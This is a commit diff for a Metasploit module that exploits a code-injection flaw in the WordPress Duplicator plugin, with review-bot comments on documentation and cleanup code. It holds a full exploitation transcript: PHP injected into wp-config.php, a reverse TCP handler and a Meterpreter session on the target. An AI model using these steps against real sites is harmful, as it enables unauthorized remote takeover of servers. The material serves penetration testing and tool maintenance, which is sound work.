renamed module and doc

master
Shelby Pace 2018-12-11 11:59:19 -06:00
parent 7e953e34b9
commit b82e3469a2
No known key found for this signature in database
GPG Key ID: B2F3A8B476406857
2 changed files with 25 additions and 21 deletions


@ -23,7 +23,7 @@ Put the `install.php` and archive files on a clean web server.
Confirm that functionality works:
1. Start `msfconsole`
2. `use exploit/multi/php/wordpress_duplicator`
2. `use exploit/multi/php/wp_duplicator_code_inject`
3. Set the `RHOST`.
4. Confirm the target is vulnerable: `check`
5. Confirm that the target is vulnerable: `The target is vulnerable.`
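Review bot: Steps 4 and 5 in the context around the renamed `use` line both read "Confirm the target is vulnerable", so step 5 looks like a second action when it is really the expected output of `check`. While this list is being touched, consider rewording step 5 to something like "Verify that the output is `The target is vulnerable.`". Also, the hunk header context refers to `install.php` while the options text in the next hunk header refers to `installer.php`; the doc should use one file name throughout.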
@ -44,26 +44,29 @@ The path to the installer.php file to exploit By default, the path is `/installe
### Debian 9 running WordPress 4.9.8 with Duplicator 1.2.40
```
msf5 > use exploit/multi/php/wordpress_duplicator
msf5 exploit(multi/php/wordpress_duplicator) > set RHOSTS 1.1.1.1
RHOSTS => 192.168.56.101
msf5 exploit(multi/php/wordpress_duplicator) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf5 exploit(multi/php/wordpress_duplicator) > set TARGETURI /installer_vuln.php
TARGETURI => /installer_vuln.php
msf5 exploit(multi/php/wordpress_duplicator) > run
msf5 > use exploit/multi/php/wp_duplicator_code_inject
msf5 exploit(multi/php/wp_duplicator_code_inject) > set rhosts 192.168.37.247
rhosts => 192.168.37.247
msf5 exploit(multi/php/wp_duplicator_code_inject) > set targeturi /wordpress/installer.php
targeturi => /wordpress/installer.php
msf5 exploit(multi/php/wp_duplicator_code_inject) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf5 exploit(multi/php/wp_duplicator_code_inject) > run
[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Started reverse TCP handler on 192.168.37.1:4444
[*] Checking if the wp-config.php file already exists...
[*] This WordPress was not restored. Creating the wp-config.php file...
[*] Successfully created the wp-config.php file!
[*] All good! Injecting PHP code in the wp-config.php file...
[*] Requesting wp-config.php to execute the payload...
[*] Sending stage (37775 bytes) to 1.1.1.1
[*] Sending stage (38247 bytes) to 192.168.37.247
[*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.247:1251) at 2018-12-11 11:46:16 -0600
[*] Attempting to recreate wp-config file...
[*] Found archive name 20181127_test_site_126e49aaa44976fa5226181127215223_archive.zip
[*] Successfully created the wp-config.php file!
meterpreter > sysinfo
Computer : debian
OS : Linux debian 4.9.0-6-amd64 #1 SMP Debian 4.9.88-1+deb9u1 (2018-05-07) x86_64
Meterpreter : php/linux
meterpreter > sysinfo
Computer : WIN-0FAJA14JLP4
OS : Windows NT WIN-0FAJA14JLP4 6.1 build 7601 (Windows 7 Enterprise Edition Service Pack 1) i586
Meterpreter : php/windows
meterpreter >
```
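Review bot: The scenario heading still reads "Debian 9 running WordPress 4.9.8 with Duplicator 1.2.40", but the replacement transcript's `sysinfo` reports `Windows 7 Enterprise Edition Service Pack 1` and `Meterpreter : php/windows`. Either update the heading to describe the Windows host that was actually tested, or keep the Debian run and add the Windows run as a second scenario under its own heading. If the WordPress and Duplicator versions differ on the new host, those should be restated as well.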


@ -143,12 +143,13 @@ class MetasploitModule < Msf::Exploit::Remote
end
def on_new_session(client)
if client.type.eql? 'meterpreter'
client.core.use 'stdapi' unless client.ext.aliases.include? 'stdapi'
client.fs.file.rm 'wp-config.php'
if client.type.eql?('meterpreter')
client.core.use('stdapi') unless client.ext.aliases.include?('stdapi')
client.fs.file.rm('wp-config.php')
else
client.shell_command_token 'rm wp-config.php'
client.shell_command_token('rm wp-config.php')
end
print_status("Attempting to recreate wp-config file...")
create_wp_config_file
end
end
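Review bot: In the `else` branch of `on_new_session`, `client.shell_command_token('rm wp-config.php')` assumes a POSIX shell, while the documentation updated in this same commit demonstrates a Windows target. On a Windows command shell session the `rm` will not remove the file, and `create_wp_config_file` then runs against a `wp-config.php` that still carries the injected code. Consider choosing the delete command by platform, and wrapping the removal in a `begin`/`rescue` so that a failed `client.fs.file.rm('wp-config.php')` is reported with `print_warning` instead of aborting before the restore step. The relative path also depends on the session's working directory being the WordPress root, which deserves a comment or an explicit path.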